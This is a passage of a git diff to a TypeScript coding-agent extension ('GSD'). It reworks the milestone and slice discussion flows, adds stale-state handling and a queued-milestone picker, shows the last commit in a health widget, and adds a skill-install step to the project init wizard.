-    ctx.ui.notify("No active milestone. Run /gsd to create one first.", "warning");
+  // Rebuild STATE.md from derived state before any dispatch (#3475).
+  // Without this, guided prompts read a stale STATE.md cache and the
+  // agent bootstraps from the wrong milestone.
+  try {
+    const { buildStateMarkdown } = await import("./doctor.js");
+    await saveFile(resolveGsdRootFile(basePath, "STATE"), buildStateMarkdown(state));
+  } catch (err) {
+    logWarning("guided", `STATE.md rebuild failed: ${(err as Error).message}`);
+  }
+
+  // No active milestone (or corrupted milestone with undefined id) —
+  // check for pending milestones to discuss instead
+  if (!state.activeMilestone?.id) {
+    const pendingMilestones = state.registry.filter(m => m.status === "pending");
+    if (pendingMilestones.length === 0) {
+      ctx.ui.notify("No active milestone. Run /gsd to create one first.", "warning");
+      return;
+    }
+    await showDiscussQueuedMilestone(ctx, pi, basePath, pendingMilestones);
     return;
   }
 
@@ -556,42 +789,71 @@ export async function showDiscuss(
       const basePrompt = loadPrompt("guided-discuss-milestone", {
         milestoneId: mid, milestoneTitle, inlinedTemplates: discussMilestoneTemplates, structuredQuestionsAvailable,
         commitInstruction: buildDocsCommitInstruction(`docs(${mid}): milestone context from discuss`),
+        fastPathInstruction: "",
       });
       const seed = draftContent
         ? `${basePrompt}\n\n## Prior Discussion (Draft Seed)\n\n${draftContent}`
         : basePrompt;
-      pendingAutoStart = { ctx, pi, basePath, milestoneId: mid, step: false };
-      await dispatchWorkflow(pi, seed, "gsd-discuss", ctx, "plan-milestone");
+      pendingAutoStartMap.set(basePath, { ctx, pi, basePath, milestoneId: mid, step: false, createdAt: Date.now() });
+      await dispatchWorkflow(pi, seed, "gsd-discuss", ctx, "discuss-milestone");
     } else if (choice === "discuss_fresh") {
       const discussMilestoneTemplates = inlineTemplate("context", "Context");
       const structuredQuestionsAvailable = pi.getActiveTools().includes("ask_user_questions") ? "true" : "false";
-      pendingAutoStart = { ctx, pi, basePath, milestoneId: mid, step: false };
+      pendingAutoStartMap.set(basePath, { ctx, pi, basePath, milestoneId: mid, step: false, createdAt: Date.now() });
       await dispatchWorkflow(pi, loadPrompt("guided-discuss-milestone", {
         milestoneId: mid, milestoneTitle, inlinedTemplates: discussMilestoneTemplates, structuredQuestionsAvailable,
         commitInstruction: buildDocsCommitInstruction(`docs(${mid}): milestone context from discuss`),
-      }), "gsd-discuss", ctx, "plan-milestone");
+        fastPathInstruction: "",
+      }), "gsd-discuss", ctx, "discuss-milestone");
     } else if (choice === "skip_milestone") {
       const milestoneIds = findMilestoneIds(basePath);
       const uniqueMilestoneIds = !!loadEffectiveGSDPreferences()?.preferences?.unique_milestone_ids;
       const nextId = nextMilestoneIdReserved(milestoneIds, uniqueMilestoneIds);
-      pendingAutoStart = { ctx, pi, basePath, milestoneId: nextId, step: false };
-      await dispatchWorkflow(pi, buildDiscussPrompt(nextId, `New milestone ${nextId}.`, basePath), "gsd-run", ctx, "plan-milestone");
+      pendingAutoStartMap.set(basePath, { ctx, pi, basePath, milestoneId: nextId, step: false, createdAt: Date.now() });
+      await dispatchWorkflow(pi, await prepareAndBuildDiscussPrompt(ctx, nextId, `New milestone ${nextId}.`, basePath), "gsd-run", ctx, "discuss-milestone");
     }
     return;
   }
 
-  // Guard: no roadmap yet
+  // Ensure DB is open before querying slices (#2560).
+  // showDiscuss() is a command handler — unlike tool handlers, it has no
+  // automatic ensureDbOpen() call. Without this, isDbAvailable() returns
+  // false on cold-start sessions and normSlices falls to [] → false
+  // "All slices complete" exit.
+  const { ensureDbOpen } = await import("./bootstrap/dynamic-tools.js");
+  await ensureDbOpen();
+
+  // Guard: no roadmap yet (unless DB has slices)
   const roadmapFile = resolveMilestoneFile(basePath, mid, "ROADMAP");
   const roadmapContent = roadmapFile ? await loadFile(roadmapFile) : null;
-  if (!roadmapContent) {
+  if (!roadmapContent && !isDbAvailable()) {
     ctx.ui.notify("No roadmap yet for this milestone. Run /gsd to plan first.", "warning");
     return;
   }
 
-  const roadmap = parseRoadmap(roadmapContent);
-  const pendingSlices = roadmap.slices.filter(s => !s.done);
+  // Normalize slices: prefer DB, fall back to parser
+  type NormSlice = { id: string; done: boolean; title: string };
+  let normSlices: NormSlice[];
+  if (isDbAvailable()) {
+    normSlices = getMilestoneSlices(mid).map(s => ({ id: s.id, done: s.status === "complete", title: s.title }));
+  } else {
+    normSlices = [];
+  }
+  // DB is open but returned zero slices despite a roadmap existing —
+  // the DB may be empty due to WAL loss or truncation (see #2815, #2892).
+  // Fall back to roadmap parsing to prevent false "all complete" exit.
+  if (normSlices.length === 0 && roadmapContent) {
+    normSlices = parseRoadmapSlices(roadmapContent).map(s => ({ id: s.id, done: s.done, title: s.title }));
+  }
+  const pendingSlices = normSlices.filter(s => !s.done);
 
   if (pendingSlices.length === 0) {
+    // All slices complete — but queued milestones may still need discussion (#3150)
+    const pendingMilestones = state.registry.filter(m => m.status === "pending");
+    if (pendingMilestones.length > 0) {
+      await showDiscussQueuedMilestone(ctx, pi, basePath, pendingMilestones);
+      return;
+    }
     ctx.ui.notify("All slices are complete — nothing to discuss.", "info");
     return;
   }
@@ -608,9 +870,14 @@ export async function showDiscuss(
       discussedMap.set(s.id, !!contextFile);
     }
 
-    // If all pending slices are discussed, notify and exit instead of looping
+    // If all pending slices are discussed, check for queued milestones before exiting (#3150)
     const allDiscussed = pendingSlices.every(s => discussedMap.get(s.id));
     if (allDiscussed) {
+      const pendingMilestones = state.registry.filter(m => m.status === "pending");
+      if (pendingMilestones.length > 0) {
+        await showDiscussQueuedMilestone(ctx, pi, basePath, pendingMilestones);
+        return;
+      }
       const lockData = readSessionLockData(basePath);
       const remoteAutoRunning = lockData && lockData.pid !== process.pid && isSessionLockProcessAlive(lockData);
       const nextStep = remoteAutoRunning
@@ -641,6 +908,17 @@ export async function showDiscuss(
       };
     });
 
+    // Offer access to queued milestones when any exist
+    const pendingMilestones = state.registry.filter(m => m.status === "pending");
+    if (pendingMilestones.length > 0) {
+      actions.push({
+        id: "discuss_queued_milestone",
+        label: "Discuss a queued milestone",
+        description: `Refine context for ${pendingMilestones.length} queued milestone(s). Does not affect current execution.`,
+        recommended: false,
+      });
+    }
+
     const choice = await showNextAction(ctx, {
       title: "GSD — Discuss a slice",
       summary: [
@@ -653,6 +931,11 @@ export async function showDiscuss(
 
     if (choice === "not_yet") return;
 
+    if (choice === "discuss_queued_milestone") {
+      await showDiscussQueuedMilestone(ctx, pi, basePath, pendingMilestones);
+      return;
+    }
+
     const chosen = pendingSlices.find(s => s.id === choice);
     if (!chosen) return;
 
@@ -673,8 +956,9 @@ export async function showDiscuss(
       if (confirm !== "rediscuss") continue;
     }
 
-    const prompt = await buildDiscussSlicePrompt(mid, chosen.id, chosen.title, basePath, { rediscuss: isRediscuss });
-    await dispatchWorkflow(pi, prompt, "gsd-discuss", ctx, "plan-slice");
+    const sqAvail = pi.getActiveTools().includes("ask_user_questions") ? "true" : "false";
+    const prompt = await buildDiscussSlicePrompt(mid, chosen.id, chosen.title, basePath, { rediscuss: isRediscuss, structuredQuestionsAvailable: sqAvail });
+    await dispatchWorkflow(pi, prompt, "gsd-discuss", ctx, "discuss-slice");
 
     // Wait for the discuss session to finish, then loop back to the picker
     await ctx.waitForIdle();
@@ -682,6 +966,121 @@ export async function showDiscuss(
   }
 }
 
+// ─── Queued Milestone Discussion ─────────────────────────────────────────────
+
+/**
+ * Show a picker of queued (pending) milestones and dispatch a discuss flow for
+ * the chosen one. Discussing a queued milestone does NOT activate it — it only
+ * refines the CONTEXT.md artifact so it is better prepared when auto-mode
+ * eventually reaches it.
+ */
+async function showDiscussQueuedMilestone(
+  ctx: ExtensionCommandContext,
+  pi: ExtensionAPI,
+  basePath: string,
+  pendingMilestones: Array<{ id: string; title: string; status: string }>,
+): Promise<void> {
+  const actions = pendingMilestones.map((m, i) => {
+    const hasContext = !!resolveMilestoneFile(basePath, m.id, "CONTEXT");
+    const hasDraft = !hasContext && !!resolveMilestoneFile(basePath, m.id, "CONTEXT-DRAFT");
+    const contextStatus = hasContext ? "context ✓" : hasDraft ? "draft context" : "no context yet";
+    return {
+      id: m.id,
+      label: `${m.id}: ${m.title}`,
+      description: `[queued] · ${contextStatus}`,
+      recommended: i === 0,
+    };
+  });
+
+  const choice = await showNextAction(ctx, {
+    title: "GSD — Discuss a queued milestone",
+    summary: [
+      "Select a queued milestone to discuss.",
+      "Discussing will update its context file. It will not be activated.",
+    ],
+    actions,
+    notYetMessage: "Run /gsd discuss when ready.",
+  });
+
+  if (choice === "not_yet") return;
+
+  const chosen = pendingMilestones.find(m => m.id === choice);
+  if (!chosen) return;
+
+  const hasDraft = !!resolveMilestoneFile(basePath, chosen.id, "CONTEXT-DRAFT");
+  let fastPath = hasDraft;
+
+  if (!hasDraft) {
+    const mode = await showNextAction(ctx, {
+      title: `Discuss ${chosen.id}`,
+      summary: [
+        "Choose how to start the discussion.",
+        "Fast path skips generic scouting — use it when you already know the scope.",
+      ],
+      actions: [
+        {
+          id: "full",
+          label: "Full discussion",
+          description: "Scout the codebase, ask open-ended questions, explore deeply",
+          recommended: true,
+        },
+        {
+          id: "fast",
+          label: "I have the scope — fast path",
+          description: "Treat your first message as authoritative seed context; skip scouting",
+        },
+      ],
+      notYetMessage: "Run /gsd discuss when ready.",
+    });
+    if (mode === "not_yet") return;
+    fastPath = mode === "fast";
+  }
+
+  await dispatchDiscussForMilestone(ctx, pi, basePath, chosen.id, chosen.title, { fastPath });
+}
+
+/**
+ * Dispatch the guided-discuss-milestone prompt for a milestone without
+ * setting pendingAutoStart — so discussing a queued milestone does not
+ * implicitly activate it when the session ends.
+ */
+async function dispatchDiscussForMilestone(
+  ctx: ExtensionCommandContext,
+  pi: ExtensionAPI,
+  basePath: string,
+  mid: string,
+  milestoneTitle: string,
+  opts: { fastPath?: boolean } = {},
+): Promise<void> {
+  const draftFile = resolveMilestoneFile(basePath, mid, "CONTEXT-DRAFT");
+  const draftContent = draftFile ? await loadFile(draftFile) : null;
+  const hasSeed = !!(draftContent || opts.fastPath);
+  const fastPathInstruction = hasSeed
+    ? [
+        "> **Fast path active — scope provided.**",
+        "> Do NOT perform a generic codebase scouting pass.",
+        "> Do at most 2 targeted reads to check for obvious conflicts with existing work.",
+        "> Treat the seed context or the operator's first message as authoritative.",
+        "> Move directly to the depth summary and write step.",
+        "> Ask only questions where the answer would materially change scope.",
+      ].join("\n")
+    : "";
+  const discussMilestoneTemplates = inlineTemplate("context", "Context");
+  const structuredQuestionsAvailable = pi.getActiveTools().includes("ask_user_questions") ? "true" : "false";
+  const basePrompt = loadPrompt("guided-discuss-milestone", {
+    milestoneId: mid,
+    milestoneTitle,
+    inlinedTemplates: discussMilestoneTemplates,
+    structuredQuestionsAvailable,
+    commitInstruction: buildDocsCommitInstruction(`docs(${mid}): milestone context from discuss`),
+    fastPathInstruction,
+  });
+  const prompt = draftContent
+    ? `${basePrompt}\n\n## Prior Discussion (Draft Seed)\n\n${draftContent}`
+    : basePrompt;
+  await dispatchWorkflow(pi, prompt, "gsd-discuss", ctx, "discuss-milestone");
+}
+
 // ─── Smart Entry Point ────────────────────────────────────────────────────────
 
 /**
@@ -717,8 +1116,8 @@ function selfHealRuntimeRecords(basePath: string, ctx: ExtensionContext): { clea
       ctx.ui.notify(`Self-heal: cleared ${cleared} stale runtime record(s) from a previous session.`, "info");
     }
     return { cleared };
-  } catch {
-    // Non-fatal — self-heal should never block the wizard
+  } catch (e) {
+    logWarning("guided", `self-heal stale runtime records failed: ${(e as Error).message}`);
     return { cleared: 0 };
   }
 }
@@ -815,11 +1214,11 @@ async function handleMilestoneActions(
     const milestoneIds = findMilestoneIds(basePath);
     const uniqueMilestoneIds = !!loadEffectiveGSDPreferences()?.preferences?.unique_milestone_ids;
     const nextId = nextMilestoneIdReserved(milestoneIds, uniqueMilestoneIds);
-    pendingAutoStart = { ctx, pi, basePath, milestoneId: nextId, step: stepMode };
-    await dispatchWorkflow(pi, buildDiscussPrompt(nextId,
+    pendingAutoStartMap.set(basePath, { ctx, pi, basePath, milestoneId: nextId, step: stepMode, createdAt: Date.now() });
+    await dispatchWorkflow(pi, await prepareAndBuildDiscussPrompt(ctx, nextId,
       `New milestone ${nextId}.`,
       basePath
-    ), "gsd-run", ctx, "plan-milestone");
+    ), "gsd-run", ctx, "discuss-milestone");
     return true;
   }
 
@@ -835,6 +1234,11 @@ export async function showSmartEntry(
 ): Promise<void> {
   const stepMode = options?.step;
 
+  // ── Clear stale milestone ID reservations from previous cancelled sessions ──
+  // Reservations only need to survive within a single /gsd interaction.
+  // Without this, each cancelled session permanently bumps the next ID. (#2488)
+  clearReservedMilestoneIds();
+
   // ── Directory safety check — refuse to operate in system/home dirs ───
   const dirCheck = validateDirectory(basePath);
   if (dirCheck.severity === "blocked") {
@@ -852,7 +1256,15 @@ export async function showSmartEntry(
   }
 
   // ── Detection preamble — run before any bootstrap ────────────────────
-  if (!existsSync(gsdRoot(basePath))) {
+  // Check bootstrap completeness, not just .gsd/ directory existence.
+  // A zombie .gsd/ state (symlink exists but missing PREFERENCES.md and
+  // milestones/) must trigger the init wizard, not skip it (#2942).
+  const gsdPath = gsdRoot(basePath);
+  const hasBootstrapArtifacts = existsSync(gsdPath)
+    && (existsSync(join(gsdPath, "PREFERENCES.md"))
+        || existsSync(join(gsdPath, "milestones")));
+
+  if (!hasBootstrapArtifacts) {
     const detection = detectProjectState(basePath);
 
     // v1 .planning/ detected — offer migration before anything else
@@ -867,7 +1279,7 @@ export async function showSmartEntry(
       // "fresh" — fall through to init wizard
     }
 
-    // No .gsd/ — run the project init wizard
+    // No .gsd/ or zombie .gsd/ — run the project init wizard
     const result = await showProjectInit(ctx, pi, basePath, detection);
     if (!result.completed) return; // User cancelled
 
@@ -932,14 +1344,36 @@ export async function showSmartEntry(
   // state from a worktree path that was cleaned up in the stale branch above.
   const state = await deriveState(basePath);
 
-  if (!state.activeMilestone) {
+  // Rebuild STATE.md from derived state before any dispatch (#3475).
+  try {
+    const { buildStateMarkdown } = await import("./doctor.js");
+    await saveFile(resolveGsdRootFile(basePath, "STATE"), buildStateMarkdown(state));
+  } catch (err) {
+    logWarning("guided", `STATE.md rebuild failed: ${(err as Error).message}`);
+  }
+
+  if (!state.activeMilestone?.id) {
     // Guard: if a discuss session is already in flight, don't re-inject the prompt.
     // Both /gsd and /gsd auto reach this branch when no milestone exists yet.
-    // Without this guard, every subsequent /gsd call overwrites pendingAutoStart
+    // Without this guard, every subsequent /gsd call overwrites the pending auto-start
     // and fires another dispatchWorkflow, resetting the conversation mid-interview.
-    if (pendingAutoStart) {
-      ctx.ui.notify("Discussion already in progress — answer the question above to continue.", "info");
-      return;
+    if (pendingAutoStartMap.has(basePath)) {
+      // #3274: If /clear interrupted the discussion, the pending entry is stale.
+      // Detect staleness: no manifest, no CONTEXT.md, AND entry is older than
+      // 30s (avoids race between .set() and LLM writing first artifact).
+      const entry = pendingAutoStartMap.get(basePath)!;
+      const ageMs = Date.now() - (entry.createdAt || 0);
+      const manifestExists = existsSync(join(gsdRoot(basePath), "DISCUSSION-MANIFEST.json"));
+      const milestoneHasContext = existsSync(
+        join(gsdRoot(basePath), "milestones", entry.milestoneId, `${entry.milestoneId}-CONTEXT.md`),
+      );
+      if (!manifestExists && !milestoneHasContext && ageMs > 30_000) {
+        // Stale entry from an interrupted discussion — clear and continue
+        pendingAutoStartMap.delete(basePath);
+      } else {
+        ctx.ui.notify("Discussion already in progress — answer the question above to continue.", "info");
+        return;
+      }
     }
 
     const milestoneIds = findMilestoneIds(basePath);
@@ -960,7 +1394,7 @@ export async function showSmartEntry(
             );
             return;
           }
-        } catch { /* directory exists but unreadable — fall through to normal flow */ }
+        } catch (e) { logWarning("guided", `directory read failed: ${(e as Error).message}`); }
       }
     }
 
@@ -970,11 +1404,11 @@ export async function showSmartEntry(
 
     if (isFirst) {
       // First ever — skip wizard, just ask directly
-      pendingAutoStart = { ctx, pi, basePath, milestoneId: nextId, step: stepMode };
-      await dispatchWorkflow(pi, buildDiscussPrompt(nextId,
+      pendingAutoStartMap.set(basePath, { ctx, pi, basePath, milestoneId: nextId, step: stepMode, createdAt: Date.now() });
+      await dispatchWorkflow(pi, await prepareAndBuildDiscussPrompt(ctx, nextId,
         `New project, milestone ${nextId}. Do NOT read or explore .gsd/ — it's empty scaffolding.`,
         basePath
-      ), "gsd-run", ctx, "plan-milestone");
+      ), "gsd-run", ctx, "discuss-milestone");
     } else {
       const choice = await showNextAction(ctx, {
         title: "GSD — Get Shit Done",
@@ -991,11 +1425,11 @@ export async function showSmartEntry(
       });
 
       if (choice === "new_milestone") {
-        pendingAutoStart = { ctx, pi, basePath, milestoneId: nextId, step: stepMode };
-        await dispatchWorkflow(pi, buildDiscussPrompt(nextId,
+        pendingAutoStartMap.set(basePath, { ctx, pi, basePath, milestoneId: nextId, step: stepMode, createdAt: Date.now() });
+        await dispatchWorkflow(pi, await prepareAndBuildDiscussPrompt(ctx, nextId,
           `New milestone ${nextId}.`,
           basePath
-        ), "gsd-run", ctx, "plan-milestone");
+        ), "gsd-run", ctx, "discuss-milestone");
       }
     }
     return;
@@ -1030,11 +1464,11 @@ export async function showSmartEntry(
       const uniqueMilestoneIds = !!loadEffectiveGSDPreferences()?.preferences?.unique_milestone_ids;
       const nextId = nextMilestoneIdReserved(milestoneIds, uniqueMilestoneIds);
 
-      pendingAutoStart = { ctx, pi, basePath, milestoneId: nextId, step: stepMode };
-      await dispatchWorkflow(pi, buildDiscussPrompt(nextId,
+      pendingAutoStartMap.set(basePath, { ctx, pi, basePath, milestoneId: nextId, step: stepMode, createdAt: Date.now() });
+      await dispatchWorkflow(pi, await prepareAndBuildDiscussPrompt(ctx, nextId,
         `New milestone ${nextId}.`,
         basePath
-      ), "gsd-run", ctx, "plan-milestone");
+      ), "gsd-run", ctx, "discuss-milestone");
     } else if (choice === "status") {
       const { fireStatusViaCommand } = await import("./commands.js");
       await fireStatusViaCommand(ctx);
@@ -1077,29 +1511,31 @@ export async function showSmartEntry(
       const basePrompt = loadPrompt("guided-discuss-milestone", {
         milestoneId, milestoneTitle, inlinedTemplates: discussMilestoneTemplates, structuredQuestionsAvailable,
         commitInstruction: buildDocsCommitInstruction(`docs(${milestoneId}): milestone context from discuss`),
+        fastPathInstruction: "",
       });
       const seed = draftContent
         ? `${basePrompt}\n\n## Prior Discussion (Draft Seed)\n\n${draftContent}`
         : basePrompt;
-      pendingAutoStart = { ctx, pi, basePath, milestoneId, step: stepMode };
-      await dispatchWorkflow(pi, seed, "gsd-discuss", ctx, "plan-milestone");
+      pendingAutoStartMap.set(basePath, { ctx, pi, basePath, milestoneId, step: stepMode, createdAt: Date.now() });
+      await dispatchWorkflow(pi, seed, "gsd-discuss", ctx, "discuss-milestone");
     } else if (choice === "discuss_fresh") {
       const discussMilestoneTemplates = inlineTemplate("context", "Context");
       const structuredQuestionsAvailable = pi.getActiveTools().includes("ask_user_questions") ? "true" : "false";
-      pendingAutoStart = { ctx, pi, basePath, milestoneId, step: stepMode };
+      pendingAutoStartMap.set(basePath, { ctx, pi, basePath, milestoneId, step: stepMode, createdAt: Date.now() });
       await dispatchWorkflow(pi, loadPrompt("guided-discuss-milestone", {
         milestoneId, milestoneTitle, inlinedTemplates: discussMilestoneTemplates, structuredQuestionsAvailable,
         commitInstruction: buildDocsCommitInstruction(`docs(${milestoneId}): milestone context from discuss`),
-      }), "gsd-discuss", ctx, "plan-milestone");
+        fastPathInstruction: "",
+      }), "gsd-discuss", ctx, "discuss-milestone");
     } else if (choice === "skip_milestone") {
       const milestoneIds = findMilestoneIds(basePath);
       const uniqueMilestoneIds = !!loadEffectiveGSDPreferences()?.preferences?.unique_milestone_ids;
       const nextId = nextMilestoneIdReserved(milestoneIds, uniqueMilestoneIds);
-      pendingAutoStart = { ctx, pi, basePath, milestoneId: nextId, step: stepMode };
-      await dispatchWorkflow(pi, buildDiscussPrompt(nextId,
+      pendingAutoStartMap.set(basePath, { ctx, pi, basePath, milestoneId: nextId, step: stepMode, createdAt: Date.now() });
+      await dispatchWorkflow(pi, await prepareAndBuildDiscussPrompt(ctx, nextId,
         `New milestone ${nextId}.`,
         basePath
-      ), "gsd-run", ctx, "plan-milestone");
+      ), "gsd-run", ctx, "discuss-milestone");
     }
     return;
   }
@@ -1109,7 +1545,19 @@ export async function showSmartEntry(
     const roadmapFile = resolveMilestoneFile(basePath, milestoneId, "ROADMAP");
     const hasRoadmap = !!(roadmapFile && await loadFile(roadmapFile));
 
-    if (!hasRoadmap) {
+    // A roadmap file with zero parseable slices (placeholder text) should be
+    // treated the same as no roadmap — offer "Create roadmap" instead of "Go auto"
+    // which would immediately get stuck in blocked state (#3441).
+    let roadmapHasSlices = false;
+    if (hasRoadmap) {
+      const roadmapContent = await loadFile(roadmapFile!);
+      if (roadmapContent) {
+        const parsed = parseRoadmapSlices(roadmapContent);
+        roadmapHasSlices = parsed.length > 0;
+      }
+    }
+
+    if (!hasRoadmap || !roadmapHasSlices) {
       // No roadmap → discuss or plan
       const contextFile = resolveMilestoneFile(basePath, milestoneId, "CONTEXT");
       const hasContext = !!(contextFile && await loadFile(contextFile));
@@ -1148,7 +1596,7 @@ export async function showSmartEntry(
       });
 
       if (choice === "plan") {
-        pendingAutoStart = { ctx, pi, basePath, milestoneId, step: stepMode };
+        pendingAutoStartMap.set(basePath, { ctx, pi, basePath, milestoneId, step: stepMode, createdAt: Date.now() });
         const planMilestoneTemplates = [
           inlineTemplate("roadmap", "Roadmap"),
           inlineTemplate("plan", "Slice Plan"),
@@ -1174,16 +1622,17 @@ export async function showSmartEntry(
         await dispatchWorkflow(pi, loadPrompt("guided-discuss-milestone", {
           milestoneId, milestoneTitle, inlinedTemplates: discussMilestoneTemplates, structuredQuestionsAvailable,
           commitInstruction: buildDocsCommitInstruction(`docs(${milestoneId}): milestone context from discuss`),
-        }), "gsd-run", ctx, "plan-milestone");
+          fastPathInstruction: "",
+        }), "gsd-run", ctx, "discuss-milestone");
       } else if (choice === "skip_milestone") {
         const milestoneIds = findMilestoneIds(basePath);
         const uniqueMilestoneIds = !!loadEffectiveGSDPreferences()?.preferences?.unique_milestone_ids;
         const nextId = nextMilestoneIdReserved(milestoneIds, uniqueMilestoneIds);
-        pendingAutoStart = { ctx, pi, basePath, milestoneId: nextId, step: stepMode };
-        await dispatchWorkflow(pi, buildDiscussPrompt(nextId,
+        pendingAutoStartMap.set(basePath, { ctx, pi, basePath, milestoneId: nextId, step: stepMode, createdAt: Date.now() });
+        await dispatchWorkflow(pi, await prepareAndBuildDiscussPrompt(ctx, nextId,
           `New milestone ${nextId}.`,
           basePath
-        ), "gsd-run", ctx, "plan-milestone");
+        ), "gsd-run", ctx, "discuss-milestone");
       } else if (choice === "discard_milestone") {
         const confirmed = await showConfirm(ctx, {
           title: "Discard milestone?",
@@ -1309,7 +1758,8 @@ export async function showSmartEntry(
         }),
       }), "gsd-run", ctx, "plan-slice");
     } else if (choice === "discuss") {
-      await dispatchWorkflow(pi, await buildDiscussSlicePrompt(milestoneId, sliceId, sliceTitle, basePath, { rediscuss: hasContext }), "gsd-run", ctx, "plan-slice");
+      const sqAvail = pi.getActiveTools().includes("ask_user_questions") ? "true" : "false";
+      await dispatchWorkflow(pi, await buildDiscussSlicePrompt(milestoneId, sliceId, sliceTitle, basePath, { rediscuss: hasContext, structuredQuestionsAvailable: sqAvail }), "gsd-run", ctx, "discuss-slice");
     } else if (choice === "research") {
       const researchTemplates = inlineTemplate("research", "Research");
       await dispatchWorkflow(pi, loadPrompt("guided-research-slice", {
diff --git a/src/resources/extensions/gsd/health-widget-core.ts b/src/resources/extensions/gsd/health-widget-core.ts
index cc50f2099..783baf1da 100644
--- a/src/resources/extensions/gsd/health-widget-core.ts
+++ b/src/resources/extensions/gsd/health-widget-core.ts
@@ -18,6 +18,10 @@ export interface HealthWidgetData {
   providerIssue: string | null;
   environmentErrorCount: number;
   environmentWarningCount: number;
+  /** Unix epoch (seconds) of the last commit, or null if unavailable. */
+  lastCommitEpoch: number | null;
+  /** Subject line of the last commit, or null if unavailable. */
+  lastCommitMessage: string | null;
   lastRefreshed: number;
 }
 
@@ -32,6 +36,29 @@ function formatCost(n: number): string {
   return n >= 1 ? `$${n.toFixed(2)}` : `${(n * 100).toFixed(1)}¢`;
 }
 
+/**
+ * Format a Unix epoch (seconds) as a human-readable relative time string.
+ * Returns "just now" for <1m, "Xm ago" for <1h, "Xh ago" for <24h, "Xd ago" otherwise.
+ */
+export function formatRelativeTime(epochSeconds: number): string {
+  const diffSeconds = Math.floor(Date.now() / 1000) - epochSeconds;
+  if (diffSeconds < 60) return "just now";
+  const minutes = Math.floor(diffSeconds / 60);
+  if (minutes < 60) return `${minutes}m ago`;
+  const hours = Math.floor(minutes / 60);
+  if (hours < 24) return `${hours}h ago`;
+  const days = Math.floor(hours / 24);
+  return `${days}d ago`;
+}
+
+/**
+ * Truncate a commit message to fit the widget, appending "…" if needed.
+ */
+function truncateMessage(msg: string, maxLen: number): string {
+  if (msg.length <= maxLen) return msg;
+  return msg.slice(0, maxLen - 1) + "…";
+}
+
 /**
  * Build compact health lines for the widget.
  * Returns a string array suitable for setWidget().
@@ -73,5 +100,12 @@ export function buildHealthLines(data: HealthWidgetData): string[] {
     parts.push(`Env: ${data.environmentWarningCount} warning${data.environmentWarningCount > 1 ? "s" : ""}`);
   }
 
+  // Always-on last commit display — shows relative time + truncated message
+  if (data.lastCommitEpoch !== null && data.lastCommitEpoch > 0) {
+    const relTime = formatRelativeTime(data.lastCommitEpoch);
+    const msg = data.lastCommitMessage ? ` — ${truncateMessage(data.lastCommitMessage, 50)}` : "";
+    parts.push(`Last commit: ${relTime}${msg}`);
+  }
+
   return [`  ${parts.join("  │  ")}`];
 }
diff --git a/src/resources/extensions/gsd/health-widget.ts b/src/resources/extensions/gsd/health-widget.ts
index fa63e6677..f3f2d262a 100644
--- a/src/resources/extensions/gsd/health-widget.ts
+++ b/src/resources/extensions/gsd/health-widget.ts
@@ -13,6 +13,7 @@ import type { GSDState } from "./types.js";
 import { runProviderChecks, summariseProviderIssues } from "./doctor-providers.js";
 import { runEnvironmentChecks } from "./doctor-environment.js";
 import { loadEffectiveGSDPreferences } from "./preferences.js";
+import { nativeIsRepo, nativeLastCommitEpoch, nativeGetCurrentBranch, nativeCommitSubject } from "./native-git-bridge.js";
 import { loadLedgerFromDisk, getProjectTotals } from "./metrics.js";
 import { describeNextUnit, estimateTimeRemaining, updateSliceProgressCache } from "./auto-dashboard.js";
 import { projectRoot } from "./commands/context.js";
@@ -31,6 +32,8 @@ function loadHealthWidgetData(basePath: string): HealthWidgetData {
   let providerIssue: string | null = null;
   let environmentErrorCount = 0;
   let environmentWarningCount = 0;
+  let lastCommitEpoch: number | null = null;
+  let lastCommitMessage: string | null = null;
 
   const projectState = detectHealthWidgetProjectState(basePath);
 
@@ -58,6 +61,18 @@ function loadHealthWidgetData(basePath: string): HealthWidgetData {
     }
   } catch { /* non-fatal */ }
 
+  // ── Last commit info ──
+  try {
+    if (nativeIsRepo(basePath)) {
+      const branch = nativeGetCurrentBranch(basePath);
+      const epoch = nativeLastCommitEpoch(basePath, branch || "HEAD");
+      if (epoch > 0) {
+        lastCommitEpoch = epoch;
+        lastCommitMessage = nativeCommitSubject(basePath, branch || "HEAD") || null;
+      }
+    }
+  } catch { /* non-fatal */ }
+
   return {
     projectState,
     budgetCeiling,
@@ -65,6 +80,8 @@ function loadHealthWidgetData(basePath: string): HealthWidgetData {
     providerIssue,
     environmentErrorCount,
     environmentWarningCount,
+    lastCommitEpoch,
+    lastCommitMessage,
     lastRefreshed: Date.now(),
   };
 }
diff --git a/src/resources/extensions/gsd/index.ts b/src/resources/extensions/gsd/index.ts
index 13e6dc97c..d61786f6f 100644
--- a/src/resources/extensions/gsd/index.ts
+++ b/src/resources/extensions/gsd/index.ts
@@ -1,10 +1,18 @@
 import type { ExtensionAPI } from "@gsd/pi-coding-agent";
 
 export {
+  isDepthConfirmationAnswer,
   isDepthVerified,
+  isGateQuestionId,
   isQueuePhaseActive,
   setQueuePhaseActive,
   shouldBlockContextWrite,
+  shouldBlockPendingGate,
+  shouldBlockPendingGateBash,
+  shouldBlockQueueExecution,
+  setPendingGate,
+  clearPendingGate,
+  getPendingGate,
 } from "./bootstrap/write-gate.js";
 
 export default async function registerExtension(pi: ExtensionAPI) {
diff --git a/src/resources/extensions/gsd/init-wizard.ts b/src/resources/extensions/gsd/init-wizard.ts
index c83cda4a6..d5f490459 100644
--- a/src/resources/extensions/gsd/init-wizard.ts
+++ b/src/resources/extensions/gsd/init-wizard.ts
@@ -15,6 +15,8 @@ import { ensureGitignore, untrackRuntimeFiles } from "./gitignore.js";
 import { gsdRoot } from "./paths.js";
 import { assertSafeDirectory } from "./validate-directory.js";
 import type { ProjectDetection, ProjectSignals } from "./detection.js";
+import { runSkillInstallStep } from "./skill-catalog.js";
+import { generateCodebaseMap, writeCodebaseMap } from "./codebase-generator.js";
 
 // ─── Types ──────────────────────────────────────────────────────────────────────
 
@@ -223,13 +225,31 @@ export async function showProjectInit(
     await customizeAdvancedPrefs(ctx, prefs);
   }
 
-  // ── Step 8: Bootstrap .gsd/ ────────────────────────────────────────────────
+  // ── Step 8: Skill Installation ─────────────────────────────────────────────
+  try {
+    await runSkillInstallStep(ctx, signals);
+  } catch {
+    // Non-fatal — skill installation failure should never block project init
+  }
+
+  // ── Step 9: Bootstrap .gsd/ ────────────────────────────────────────────────
   bootstrapGsdDirectory(basePath, prefs, signals);
 
   // Ensure .gitignore
   ensureGitignore(basePath);
   untrackRuntimeFiles(basePath);
 
+  // Auto-generate codebase map for instant agent orientation
+  try {
+    const result = generateCodebaseMap(basePath);
+    if (result.fileCount > 0) {
